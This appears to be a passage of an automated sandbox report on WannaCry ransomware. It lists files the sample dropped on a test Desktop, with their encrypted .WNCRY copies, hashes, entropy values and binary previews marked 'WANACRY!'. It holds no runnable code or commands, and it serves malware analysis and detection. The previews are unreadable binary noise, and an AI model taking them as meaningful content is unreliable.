C:\Users\user\Desktop\EWZCVGNOWT\JDDHMPCDUJ.png.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.86321890015839
Encrypted:	false
SSDEEP:	24:bkuVBBmRNRlZrlZuST0AK0AZIO4zwDrdPNw23Epn6vXQvutkDjgO5Gj9K:bk5bhZ1Ty34z+dPWYMnakDjgOGE
MD5:	D0BCB45671B6F1FD073191FDC2033ECC
SHA1:	6EBAFCBC020C16E25DAD584D75D4A180136518D3
SHA-256:	84C23649E6D97ACC655A00D38C17CB1713321D7FA2617ED338FC94E74DEE5A0E
SHA-512:	C73615C6FC6ACB979A4D4AAB21DD0FF1C9B8F7A7DC41EFB98FBED7E81D7D1204DD697ABEDC4EE5B39640F3D2B6266199B087BA91CACB049E03DDE2867925D84E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....o..3..gMXe...2.0T..gs.(g..H..R....3.lw[..s........2M....rf...9LTv&..j)oW...Qa..}XZU!'4...Uaq.J.9.......Z....k..;k.h.Nm...{I`!~..@.b.....{=lfI.xP...`.\|O....M.....D0.A.q.............a..1TS..{..&..pL..:.}.Y...5.\|.D.v...(..'`0.xe...U...ibC.....7...............?....?..a.1.Q......h..98.W9....D...8..d...IJ.......S..><.H.T`8`...n.....4'.~..&...fP..u..jU...S.E..n.. .;^O...t@dx("........{._...........ZXp.lJ[.g\.Y.k....y.F.h."..X....F.,..d..`.c.....l....G....-......uz>.I.........pF.S...<.).q......`]...P.2....'6........n%.T.z...\|x.....{M..t..:M.c..r..;..fD}].....Z&.A.....Y.1Q.{.KP.........B......c....;..&p...qW.\...{..7.......k.Y....V..........a.8...ga..a..W.XI......../....V....A..b..Zr . ..H.b9+.&..U..2..\|..B.ca...V...;.o...M.+...9..T.I>V.4......m..,.6f.v......0%X.k....jL?......`F...._......k.\.K...S.]...S1.....R...,_).r{........,a.Y..c.Z.....v.."..Oe.5O.".......Bn-.0...>.l...^N6.+...73GQ.es( p.v.f.....8..>z.%-.d.s..9}C...">

C:\Users\user\Desktop\EWZCVGNOWT\JDDHMPCDUJ.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.86321890015839
Encrypted:	false
SSDEEP:	24:bkuVBBmRNRlZrlZuST0AK0AZIO4zwDrdPNw23Epn6vXQvutkDjgO5Gj9K:bk5bhZ1Ty34z+dPWYMnakDjgOGE
MD5:	D0BCB45671B6F1FD073191FDC2033ECC
SHA1:	6EBAFCBC020C16E25DAD584D75D4A180136518D3
SHA-256:	84C23649E6D97ACC655A00D38C17CB1713321D7FA2617ED338FC94E74DEE5A0E
SHA-512:	C73615C6FC6ACB979A4D4AAB21DD0FF1C9B8F7A7DC41EFB98FBED7E81D7D1204DD697ABEDC4EE5B39640F3D2B6266199B087BA91CACB049E03DDE2867925D84E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....o..3..gMXe...2.0T..gs.(g..H..R....3.lw[..s........2M....rf...9LTv&..j)oW...Qa..}XZU!'4...Uaq.J.9.......Z....k..;k.h.Nm...{I`!~..@.b.....{=lfI.xP...`.\|O....M.....D0.A.q.............a..1TS..{..&..pL..:.}.Y...5.\|.D.v...(..'`0.xe...U...ibC.....7...............?....?..a.1.Q......h..98.W9....D...8..d...IJ.......S..><.H.T`8`...n.....4'.~..&...fP..u..jU...S.E..n.. .;^O...t@dx("........{._...........ZXp.lJ[.g\.Y.k....y.F.h."..X....F.,..d..`.c.....l....G....-......uz>.I.........pF.S...<.).q......`]...P.2....'6........n%.T.z...\|x.....{M..t..:M.c..r..;..fD}].....Z&.A.....Y.1Q.{.KP.........B......c....;..&p...qW.\...{..7.......k.Y....V..........a.8...ga..a..W.XI......../....V....A..b..Zr . ..H.b9+.&..U..2..\|..B.ca...V...;.o...M.+...9..T.I>V.4......m..,.6f.v......0%X.k....jL?......`F...._......k.\.K...S.]...S1.....R...,_).r{........,a.Y..c.Z.....v.."..Oe.5O.".......Bn-.0...>.l...^N6.+...73GQ.es( p.v.f.....8..>z.%-.d.s..9}C...">

C:\Users\user\Desktop\EWZCVGNOWT\KLIZUSIQEN.pdf

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.805792872916508
Encrypted:	false
SSDEEP:	24:K2aD7A545Rf4Egw/aGnVoerTnlI4KY6a8Jzw6Bw0QAUTr351x:K2a3KY4ZkDVznluzwGQH/3x
MD5:	2E0CDF17F3B806ADE61111C7E8FF8511
SHA1:	13D0B164C7B60411B79C336A3CCE1D8D2271297A
SHA-256:	C47BDDF38EF6172D38E54781BDF5A102DF1A3CD7F0A6343AF70C5AD27BD6681D
SHA-512:	D537F6A1546619ECAE4D97C6854552DDBF2CFFAC9F80566250403FE5917B4C57825CCBEBCCEFC79F632E7E0876AD7E3C259CE4114D4FEE5ED181401A5165D556
Malicious:	true
Reputation:	unknown
Preview:	..B...r9..H.Du2......kX...o.?=.IB..&........#8....A..=.-.j...v....{...p`f..l...`.....L/bB..`>.m.d.+q.z....&.,K..M..\|A~.[2s].^..O\A....f...?.-....87.a......i.Y...........>..f.5DK.'...#....D.8.....a.........,W..}\....21A........T..@.l.(....?.../.w...Lwxm.t.'.k-.s...M....S.1..j.W.=.c."..,...D..E. .........;BU._m.<.....".......#..7%C......?v.E.."..t..1.@+.d..=r.R.....X.}2=.U.._...m.....R.FS.%...9w....F..b.\|..=SY.......R..5...-.U#^...U.N8./.#....~9...eo_YwG7.......s+....I.B,.......d..\|.....ga.t.s.....7W]6..Zi_.........9L<]R6..p.G....../.......}(. .y.A.={..(x`K......Dq.2(...K..e>RtK{.W.J...t ....#.kQ..[.$..Ii.>..O.....{,.^9._{JMKG.m.<...+...}...+.lNJZ.M..{2E....Fk-.m1%e.o.0.,O;.>a..HC:.K......H..p...s..u..b.$..!.....d...<.V..... .!yjj..tbT....A..F=.o..@T[.g....@.1...O$..m..<ozz...te.ttNq...+2.Ab..}.p+....~.y...P.J....u.-...y.pq.?....?..dn.N......(:........_.}:.A.z....'v`.^=.0ymD...":....+..[...`]0Q.8t..K>.../.6.2..0?........K..%o.j.!.A;>s.u.

C:\Users\user\Desktop\EWZCVGNOWT\KLIZUSIQEN.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.839345714930627
Encrypted:	false
SSDEEP:	24:bkGOD6s0MqPT2Jk8ZcVOXJFjR99p3oM/QqGaC2OJ3/GWheZtwQznzRH6WlLODFK2:bkGe6v/OXJZRRoq1C7/G1IQTFaWlLODt
MD5:	2790CEE1E1500C2A5E376FE46D99C844
SHA1:	3D1CE91571177D2B137776F434917B21CEF5E554
SHA-256:	E040EBAAAA87517AB471343DC25F7B1E065B85898F29505461DDB638DB6644C2
SHA-512:	17953EC3112E306BE380BB962C07986BA84438DDF9287A119E122DC44BBE12C1CDFDFE6E7FD1D77217291C94F2725D1FA39A82FE468BD89BBFFAE529B5602D08
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....d...b._....~Eus.n.(.N.6......s.'.nV...1q.K.si....ur.D.D..g..j@-" .....c.(.\h.Wd."K.......+.......}.0..........Z.....4..n...I').....C.TnG.....m0..s0d.b....y.?.Yb.\..$l.j.[.".....J.l&.yo....1.c.c..$....C.z..;..+.....@\|_/.b..3U..pNi.\J..[..................S...8..@.=..L..Y.c....x{..4.E...r.V....M\|(A...2.(A..4.h.......ob.-..:.IR6.....h.....;EQF......w..a..e.]..M.......4..3.Sx.-.X....wcU!....K.....0..-....Y.>.t.(iC.......1....6n..Z..nF:y.;+....r...-b.j .V..f4.,..%y./E.!......5'#.......S.^...&.h.H($!.w..../....x&....=.q.....<.........`.E..j..T2}..J'.^2....Q..P..3.8.<..../u4Gz..x..q..Po.....T9-.].k.=.Trz!\.Pmu0...".k.+&...NG....y./.@a..'....%......J..?....a,.T.o.....y#..#.9h}....n.m.KFV.b.7.;[M...........X..K.."HIb:+...2m~.]...h.{m.,....e.....RC8..E...._..+....dn....5.S..P.{.I....@.0...56.sYCGw.x.s........X.....v.]3*.g....yo..4....Ex..j...L.P..).....qg.s....y.......v....(..r.K..).......s..[.....c..v...........GN..@..T.Im.'.......:.m.:..

C:\Users\user\Desktop\EWZCVGNOWT\KLIZUSIQEN.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.839345714930627
Encrypted:	false
SSDEEP:	24:bkGOD6s0MqPT2Jk8ZcVOXJFjR99p3oM/QqGaC2OJ3/GWheZtwQznzRH6WlLODFK2:bkGe6v/OXJZRRoq1C7/G1IQTFaWlLODt
MD5:	2790CEE1E1500C2A5E376FE46D99C844
SHA1:	3D1CE91571177D2B137776F434917B21CEF5E554
SHA-256:	E040EBAAAA87517AB471343DC25F7B1E065B85898F29505461DDB638DB6644C2
SHA-512:	17953EC3112E306BE380BB962C07986BA84438DDF9287A119E122DC44BBE12C1CDFDFE6E7FD1D77217291C94F2725D1FA39A82FE468BD89BBFFAE529B5602D08
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....d...b._....~Eus.n.(.N.6......s.'.nV...1q.K.si....ur.D.D..g..j@-" .....c.(.\h.Wd."K.......+.......}.0..........Z.....4..n...I').....C.TnG.....m0..s0d.b....y.?.Yb.\..$l.j.[.".....J.l&.yo....1.c.c..$....C.z..;..+.....@\|_/.b..3U..pNi.\J..[..................S...8..@.=..L..Y.c....x{..4.E...r.V....M\|(A...2.(A..4.h.......ob.-..:.IR6.....h.....;EQF......w..a..e.]..M.......4..3.Sx.-.X....wcU!....K.....0..-....Y.>.t.(iC.......1....6n..Z..nF:y.;+....r...-b.j .V..f4.,..%y./E.!......5'#.......S.^...&.h.H($!.w..../....x&....=.q.....<.........`.E..j..T2}..J'.^2....Q..P..3.8.<..../u4Gz..x..q..Po.....T9-.].k.=.Trz!\.Pmu0...".k.+&...NG....y./.@a..'....%......J..?....a,.T.o.....y#..#.9h}....n.m.KFV.b.7.;[M...........X..K.."HIb:+...2m~.]...h.{m.,....e.....RC8..E...._..+....dn....5.S..P.{.I....@.0...56.sYCGw.x.s........X.....v.]3*.g....yo..4....Ex..j...L.P..).....qg.s....y.......v....(..r.K..).......s..[.....c..v...........GN..@..T.Im.'.......:.m.:..

C:\Users\user\Desktop\EWZCVGNOWT\QCOILOQIKC.mp3

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.794726989426592
Encrypted:	false
SSDEEP:	24:uNRjDA4yaGBCX54b+HubGKwwAxdSgfNwRCPHHLBG4EtkqFGX9jG:qFAarXmbquCKwjNPP+EXtG
MD5:	114DF5B605ECDB765CE50B3466D0E600
SHA1:	B8517B6067479B2F524A2F7599A234C3C312B1E4
SHA-256:	D9FEC8AE80FC50DAFEFE1F4376A484AAF4F37FCBDEAF9AFDAD998E239EEAE950
SHA-512:	39B65AAF8BFC5975D8EE3148343E4B3408FE55A20A1C31EFD55E55CE5E1281B720782373E137888CFD66B14BBE1B762A97B449ACF80A326ACEC3A25D8C939C94
Malicious:	false
Reputation:	unknown
Preview:	.....g.dd\.....3Y...@..2....3}.d..3..h....\.AO.........X..w.JGe.I.......>..?!.Kb5R.....Uz../..2.l.M.w...p...EC..!.......Q......(.[.`'J.r..Q.P..(.D.....JN.BB.I.}....!.<.N...A...`.....w.h..g..A...T_].-..d..P3o..r.I.c>a\.M......-.....l5..\E............XF;.....[...+}.jm..:.9.D..<.....5.<.....q..y..8..W.+...(PPb#+a._i..v.....b.;.H.+.H1.b.......c....1%V..../. u'^..... V3v..\|[.P{.s.5..V4......QF$... M3.Y_.?Z...O.}M.~...x.......+..$+..;.6},.......E....)._...g..%.+..O.Cd..s.'..z.=:.d.J....<.]D.VW.j......h.s.@N..q.I...TUj....\|.s.QH....6~...fZJ.....).t.m. Q..I.H>"&_./....~..]..;.i.n..8.....5..Wc..R8_..HHc....B...0.\|..kF.Is.U...:f......Z..#.g@.._.....;.LpA...{.........g.ma.;.V..........B..x.[.......;Sx.4.t.<8.....pf.pe...LD.M%M..x....9...E.E(..`...}....F.Q...A....3<.P.._$.aJ... 8.....h......X.NO,.6...o;.l.J.`:H...4....5c...2F....3.a#JZY.2...C...ojT....j....%..#?..h...4p$.4....p.&.........J.-....L.ko.d.W...r\n...,\..`.\..L.V5s..-x2...^^

C:\Users\user\Desktop\EWZCVGNOWT\QCOILOQIKC.mp3.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.834420632248002
Encrypted:	false
SSDEEP:	24:bk7HexrOJ6fctEoYZxpl/5MiTiRKtzv/75X7wMJnTBQOquoCCoJ:bk7HesJctDphS0i2rdwMJdDSa
MD5:	D9CEB98282B8AD84B37317C78345F018
SHA1:	7F063E96E83A2B87B0DA4C22AA63C2188862CCEE
SHA-256:	2D55534E18E26DA0373557BDF013CF67914DA6182D8D17CBEC8018C8CEB612B8
SHA-512:	E6CA1CA3A0EE0DF83B6229525BE6AEE4B5C72E7A9B4E1F600CC14E7FE9F559AD40A01482FA7A77E7491B89596349D28D3EF80B8423F270FD08CD91B338B7E13C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....2....1.\f.Z....8..[..E.}....<&..w#z......R....r..@..s.;..1.QLn.X.D.M.z..`..9.D..h.v./..#.A. E.b..(.g..j....cj......V.._..T.D.....7L.>0@....TB?Tz..v..Ou...T.[.C...y..$.-.v..].5$.u...$...Qo..C.._.U#...FD.z..$.mk......n..h4...1.$..&.9.H.........................o\.`.3$.\q...`D...-...5.61.]...!..Nt.P.......^\.;B..\HN\.z.>.....n%.GVON}..}.t..J....zZn../Jy.i......>j..4H...E...QmB..Iq.#L...S.2E.Y..Oh.....m..ct..7i.Q...M}.....Z..._...1.r.-..n1J..y.O...r.%.C'...V..#TC.....:.g..`f.%...;P`'...w.~..Y.j8A5......\.@.-s#...2....UI......[`.....%AU.I5...<.5X2..y.ZAG.P..qq...x.....?.e.X5.Pw...6..A.v..._...I..?.t&..cH9.Mb.No.f./.)9...D...Ni.x~h.%.....'..H.>.D.G...cV.Y.1.!9i..Q&.sFa....K7..[F..;...z.AE....L...q..x,...e....2.Pm.g.m.&.-.t..^!......?..yx.Q...ol7$2.x.5G.4...T...S.;...+.....}\..K.........RF_5.0....Ss..&.0lSz...o.i.W..O.....A:........R.l........-=.z3....8Z..$..Q..d.....'".EA..v^(D...s..\|........&n.c...G......$........

C:\Users\user\Desktop\EWZCVGNOWT\QCOILOQIKC.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.834420632248002
Encrypted:	false
SSDEEP:	24:bk7HexrOJ6fctEoYZxpl/5MiTiRKtzv/75X7wMJnTBQOquoCCoJ:bk7HesJctDphS0i2rdwMJdDSa
MD5:	D9CEB98282B8AD84B37317C78345F018
SHA1:	7F063E96E83A2B87B0DA4C22AA63C2188862CCEE
SHA-256:	2D55534E18E26DA0373557BDF013CF67914DA6182D8D17CBEC8018C8CEB612B8
SHA-512:	E6CA1CA3A0EE0DF83B6229525BE6AEE4B5C72E7A9B4E1F600CC14E7FE9F559AD40A01482FA7A77E7491B89596349D28D3EF80B8423F270FD08CD91B338B7E13C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....2....1.\f.Z....8..[..E.}....<&..w#z......R....r..@..s.;..1.QLn.X.D.M.z..`..9.D..h.v./..#.A. E.b..(.g..j....cj......V.._..T.D.....7L.>0@....TB?Tz..v..Ou...T.[.C...y..$.-.v..].5$.u...$...Qo..C.._.U#...FD.z..$.mk......n..h4...1.$..&.9.H.........................o\.`.3$.\q...`D...-...5.61.]...!..Nt.P.......^\.;B..\HN\.z.>.....n%.GVON}..}.t..J....zZn../Jy.i......>j..4H...E...QmB..Iq.#L...S.2E.Y..Oh.....m..ct..7i.Q...M}.....Z..._...1.r.-..n1J..y.O...r.%.C'...V..#TC.....:.g..`f.%...;P`'...w.~..Y.j8A5......\.@.-s#...2....UI......[`.....%AU.I5...<.5X2..y.ZAG.P..qq...x.....?.e.X5.Pw...6..A.v..._...I..?.t&..cH9.Mb.No.f./.)9...D...Ni.x~h.%.....'..H.>.D.G...cV.Y.1.!9i..Q&.sFa....K7..[F..;...z.AE....L...q..x,...e....2.Pm.g.m.&.-.t..^!......?..yx.Q...ol7$2.x.5G.4...T...S.;...+.....}\..K.........RF_5.0....Ss..&.0lSz...o.i.W..O.....A:........R.l........-=.z3....8Z..$..Q..d.....'".EA..v^(D...s..\|........&n.c...G......$........

C:\Users\user\Desktop\EWZCVGNOWT\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.819991042178172
Encrypted:	false
SSDEEP:	24:p7/Mrx2xuAOdjYOPja/2QYOAj6usN9TLhL+iTfpv+4Ie0ev5Q/LdP:N/Ml2zO/ra/2QY32wiTfpmHev5C
MD5:	86283ED4017C5C03EA556060B7353A5E
SHA1:	6D5B434943EC8291EF33E3FC6BCDBAEB4C729980
SHA-256:	577C4183F24E76A62AFC0A47FEE77B3106C73A0ED83C0B83B23C9DCBED4818D1
SHA-512:	8130AA091C08D339E37E69503C4BCD2E847F52427B34F4C202773B42A831DCD97801FA7BE951F7E3FE467C8DDAFA74AAD7246DCAE9B9AB84BC85F40A816C3567
Malicious:	false
Reputation:	unknown
Preview:	.........9..Z.vd..e..o..KP.S.4..O.f....EgR(.rM.}..a'..#..L..x!~..Z.[..Ce3....U.7o......]....;.^U..j.l08r....G..;[....J.......,q.y...#..h.N....Q.........._.....+.p.;.K.....>.u.Eh._....R,s....Q......Z/H....7h.k...\...%X...".>...jS.(.2:m...N...B....L.oK...i.f.N....J....(...x..;.. \|0S.K..j.lbUI...S..5.1...@.{3..f.0Z...lE.G.oo&.b.E"Sj)].XI.K......q-....4=.......H.(..9.ZW..i..([..rt..T.....l.VI.a.^\|O.......t....D....}... kF...$f...Z..C....+=.kN.......e.....!]5 ..4y[.Nl...}?...t.3.x..uQ..(.o.I...d..P....7..y/x?.>J8.W..h..#.t&.j...3mk`....\..k.V..kS#....I.Z].q.....y......../....?.C.......`..p...[.W.HS..........CU!.....C.c2.+...G..+I^K.6}Z\|..2t.....h....y.X,..xA@.Y....Bd..N..y(.2...K..y<..V.U..%...z....a..........Z'../7..;8.x6..q.....A_w7a..m\3..n.,28...q.G.@..~EL$.....1P.,..s..>2A.!.e....D.&.."v....Y"$......W...M......u..f)..b...C.EA....DHg..lq.(./...f.E.'.c.X..i[.E.......IL...#.<(vK..#Ne..<.d\|..6.hC.V....9.h.q...n'.#ey.nb..v..[.....3......C

C:\Users\user\Desktop\EWZCVGNOWT\TQDFJHPUIU.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.856586617876763
Encrypted:	false
SSDEEP:	24:bkKkNfgyaxytIsSpbPL9hZ8ep0V+UWr4rntYBLBpybEysdIL9Yb8l/EPObfKOK:bk3FftIVpbfZ8+rSYJBkAyseWY6/j
MD5:	106F28C58E7A8742C6BE7914D1DD174F
SHA1:	A5FFAD5B54C62447B6BEBFCE2D27007767CE2959
SHA-256:	85D1EEC91CDED0431AC88BF7EE3D37FE651278FABA083179CDB5AEA51A79915C
SHA-512:	11733D3B05060EE1EB1DA5EB905302962511132384C79A0328F105E34507B720D310522C6071F1BCA4B4ACC240A88980E9F466D2ECF718B869A8D95816B25F9E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....H.lS%z.C....g..A..D\|..q.`..(.@aK../..c..!....Y..{@GT:g....0...@.....Q.7-." I.]..}._?8......o....~....38.-.b..8N..?...ekLj...,..^C.....5i.o.6O.r....F_.fr....-...r..b...R5j.\|.r.p....V8Y...D.9.r....k[c...Y..W.....Q....k....I!.\|n#..^...3.M~^...[..0............y.>...v.k..+..\|.VQ.K......6.E$.>....6..M.\n.........q..{..Y9..Y..."........$.Q...n..QY\..q...$.......4.$G.}(r<....Ca\Q.TD..W..F..N....H.........O..l...I.X...`X..^.T.......8p..o.//A}#.R.,F}....qug.....;O<.N.B....#~e.....W.N.bWC...9`.;....q._.b..Z.X.4~].on+.....@G...78_;...K2..;.....?..s.;.....a.W....'...=..d>)...5r.Q:)....R....r.ZE<...[.D#.#~0.+!.....}..5n.....H.n.........S^w......3$....sp..+S.0ir..&z.>uX...M..I.\|......8.......5..q.i..t...._.j...l..."x....M.a.q.PS'.. ..-.(.q........P.e..ca.....5-.d..F..Ka.lk..xcU..2..h..A....r^Y:4H.</....c..M....V....l.w...h.a....).f7.P&.O6m..'.i.<I.........3.,..N..&....q...?^.y.............Y'...3..c.k....%........?....&.....s.W....}..

C:\Users\user\Desktop\EWZCVGNOWT\TQDFJHPUIU.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.856586617876763
Encrypted:	false
SSDEEP:	24:bkKkNfgyaxytIsSpbPL9hZ8ep0V+UWr4rntYBLBpybEysdIL9Yb8l/EPObfKOK:bk3FftIVpbfZ8+rSYJBkAyseWY6/j
MD5:	106F28C58E7A8742C6BE7914D1DD174F
SHA1:	A5FFAD5B54C62447B6BEBFCE2D27007767CE2959
SHA-256:	85D1EEC91CDED0431AC88BF7EE3D37FE651278FABA083179CDB5AEA51A79915C
SHA-512:	11733D3B05060EE1EB1DA5EB905302962511132384C79A0328F105E34507B720D310522C6071F1BCA4B4ACC240A88980E9F466D2ECF718B869A8D95816B25F9E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....H.lS%z.C....g..A..D\|..q.`..(.@aK../..c..!....Y..{@GT:g....0...@.....Q.7-." I.]..}._?8......o....~....38.-.b..8N..?...ekLj...,..^C.....5i.o.6O.r....F_.fr....-...r..b...R5j.\|.r.p....V8Y...D.9.r....k[c...Y..W.....Q....k....I!.\|n#..^...3.M~^...[..0............y.>...v.k..+..\|.VQ.K......6.E$.>....6..M.\n.........q..{..Y9..Y..."........$.Q...n..QY\..q...$.......4.$G.}(r<....Ca\Q.TD..W..F..N....H.........O..l...I.X...`X..^.T.......8p..o.//A}#.R.,F}....qug.....;O<.N.B....#~e.....W.N.bWC...9`.;....q._.b..Z.X.4~].on+.....@G...78_;...K2..;.....?..s.;.....a.W....'...=..d>)...5r.Q:)....R....r.ZE<...[.D#.#~0.+!.....}..5n.....H.n.........S^w......3$....sp..+S.0ir..&z.>uX...M..I.\|......8.......5..q.i..t...._.j...l..."x....M.a.q.PS'.. ..-.(.q........P.e..ca.....5-.d..F..Ka.lk..xcU..2..h..A....r^Y:4H.</....c..M....V....l.w...h.a....).f7.P&.O6m..'.i.<I.........3.,..N..&....q...?^.y.............Y'...3..c.k....%........?....&.....s.W....}..

C:\Users\user\Desktop\GIGIYTFFYT.docx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.795929969771428
Encrypted:	false
SSDEEP:	24:PgJm1ZCUQX/heW1YVuHfIKCRY47j0VrJwG1iBw4WMUrQeu0AWT3:PgJmpQvhdJgX7jIN1iBwDMUr/uAz
MD5:	5E86FB584F911E2F959FD8B529E86EB7
SHA1:	515550DCC5BADD005319762438422EA8010DAFAB
SHA-256:	76CAA4C856995F41921344175AE5157FFADF2E65AF984C72EAD016B140528093
SHA-512:	BF6F05A9CCCC5E7D5790850F4B4E780ED03E888EA23D6338CA03AC3C8EA77E244DA1BAC215A16F1D68E98EA71CE18DFC1F812C9021B9C2D0970FFAE82CB219E7
Malicious:	false
Reputation:	unknown
Preview:	..%.V0....O..6.;4...2[v..\|.>..f.....b.b....}....n......J...&CCq..#Z..\|...M..d..{.J.%f`...6.."..".;.i..[...N...v.3.......\|....../..'......Q..).....Jq^...c.....].../.E.........@.;&...G...Z...z......<...]...u.....e...w.q....."..J.._s2.S}.U.K5F...H.....h4.Kr..-(..D......4......e.AB\t.D.....9.o......../.J..5..kb{u].&%[.O.i.......:.....r.\..;;..;............D/..\fDA/.GXQ..6-.PK....=.l..e....'..J.,}!8..7..7..,..o.h9..Z.&....0.wD.....hzr....x.H..;....T+@a.D&.]fep.B......R.S.&.R....Q.p.+6R.....q.UU...\|.z...^.Ok.L.Nq.r....9.o'.'Vi.:.Zt..N.......U.....z.(...=..T....P..pc........7.....1.8H....CLEzII..z.{..CjQj.z?...c.2...]>...5o.:...?.6...c.<:D........ok\.I}.....g.j.....y5w.4..I..g$.C.%.u...{.;n...%...B.b./<k..D...9.9...%......zuc.7f.4.....Q.j.q&.@.F....[F..w.;...3.ny.J..;U.L.=>g.gtC.....x..sl..s.....Z.......]..{.~.}..........P...K.BX."w..aiL..N.)......I.).4....a...+.Irq...o...g.L.....C.............2.c[Ri.n.....1O-..4....1...{$q0..}1.\|3...3H.<Q..H.5

C:\Users\user\Desktop\GIGIYTFFYT.docx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.836036937384845
Encrypted:	false
SSDEEP:	24:bk4n4vybIucawS7Z3R7PoAtx2190IaKJv1J04UWj0Jv1NyXFsC/vMGb:bk4nuGIucawS7ZRjL2190IZJv1JHeQaE
MD5:	E0F2647917E78533B8264E93771500F1
SHA1:	702D9826991AA80B10E016F5618998D83341870D
SHA-256:	BEB2B114F21C9F96BDDAFF8D774A827353BA8306AB77844966C7AC74466CEB3B
SHA-512:	953C7C3A612BDD7C3C5277C4DE14265155DC248EF94F9256DBB083B76E95389410CCB7170772D959AD2E53D21B9FC97FFC4D8FF4F698D91CBBA2CF94EC7560A0
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.........H..3.=._K.F..-`.....F..p.u.)...!k...F.)..$.m.8[...i.L.....0......6......., r.E4.....j....t.;....h..LF..ZL..4..]....;EI-.a.l.j.&Se..?......M.....&^U.t.v..s...J4-&q'n.........B.R.BAq....._}h.p...4/_...k.+..n.BR.<....~.%m....m...!...yzdMR...............^@d=.Q......T..nL..4...g.".X..&9.6.......j.....m..n?.j.?`...1.1~")..M....;.....a.......]y.....A.C.._g.1..].ir....W...#-..J...71..y.J_.0...V.go..y.?riZ.].........<a.CgMx..]...$.7J..x..tw..c>.F5..7...Z......u.Q,}.7i<.f.m..^...=A..9.M`.Q....+..I.dz....4!..XZA...I0....p.....%..3f.wE..=..E..D.A ..A^vn..7g>.r8..q.......!Ub.ZdZ..$..2i..E.....Lv...r).....8...S..&.1.c....Z..d....m.9.k-.i..3Rr3.K'.....lb...F..{.....g.vK.O'l.$l38.}...#t.4X....B..{H&-.O.8...{..<.Z...8....3..p_&...)........%...n.%.......:...:....hs..&_....J...x..30!6..(.....%:w..Na..J+....{'....^.WC...F...k..I..X.(R..%../..X...EAQx].4.......\|DjG....6..7.....[.\|..j':Ru...n.Z...`;..i..kG.Y..%]F]NP.B.)'3^.).`D7y..0K....,.s

C:\Users\user\Desktop\GIGIYTFFYT.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.836036937384845
Encrypted:	false
SSDEEP:	24:bk4n4vybIucawS7Z3R7PoAtx2190IaKJv1J04UWj0Jv1NyXFsC/vMGb:bk4nuGIucawS7ZRjL2190IZJv1JHeQaE
MD5:	E0F2647917E78533B8264E93771500F1
SHA1:	702D9826991AA80B10E016F5618998D83341870D
SHA-256:	BEB2B114F21C9F96BDDAFF8D774A827353BA8306AB77844966C7AC74466CEB3B
SHA-512:	953C7C3A612BDD7C3C5277C4DE14265155DC248EF94F9256DBB083B76E95389410CCB7170772D959AD2E53D21B9FC97FFC4D8FF4F698D91CBBA2CF94EC7560A0
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.........H..3.=._K.F..-`.....F..p.u.)...!k...F.)..$.m.8[...i.L.....0......6......., r.E4.....j....t.;....h..LF..ZL..4..]....;EI-.a.l.j.&Se..?......M.....&^U.t.v..s...J4-&q'n.........B.R.BAq....._}h.p...4/_...k.+..n.BR.<....~.%m....m...!...yzdMR...............^@d=.Q......T..nL..4...g.".X..&9.6.......j.....m..n?.j.?`...1.1~")..M....;.....a.......]y.....A.C.._g.1..].ir....W...#-..J...71..y.J_.0...V.go..y.?riZ.].........<a.CgMx..]...$.7J..x..tw..c>.F5..7...Z......u.Q,}.7i<.f.m..^...=A..9.M`.Q....+..I.dz....4!..XZA...I0....p.....%..3f.wE..=..E..D.A ..A^vn..7g>.r8..q.......!Ub.ZdZ..$..2i..E.....Lv...r).....8...S..&.1.c....Z..d....m.9.k-.i..3Rr3.K'.....lb...F..{.....g.vK.O'l.$l38.}...#t.4X....B..{H&-.O.8...{..<.Z...8....3..p_&...)........%...n.%.......:...:....hs..&_....J...x..30!6..(.....%:w..Na..J+....{'....^.WC...F...k..I..X.(R..%../..X...EAQx].4.......\|DjG....6..7.....[.\|..j':Ru...n.Z...`;..i..kG.Y..%]F]NP.B.)'3^.).`D7y..0K....,.s

C:\Users\user\Desktop\GIGIYTFFYT.xlsx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	OpenPGP Secret Key
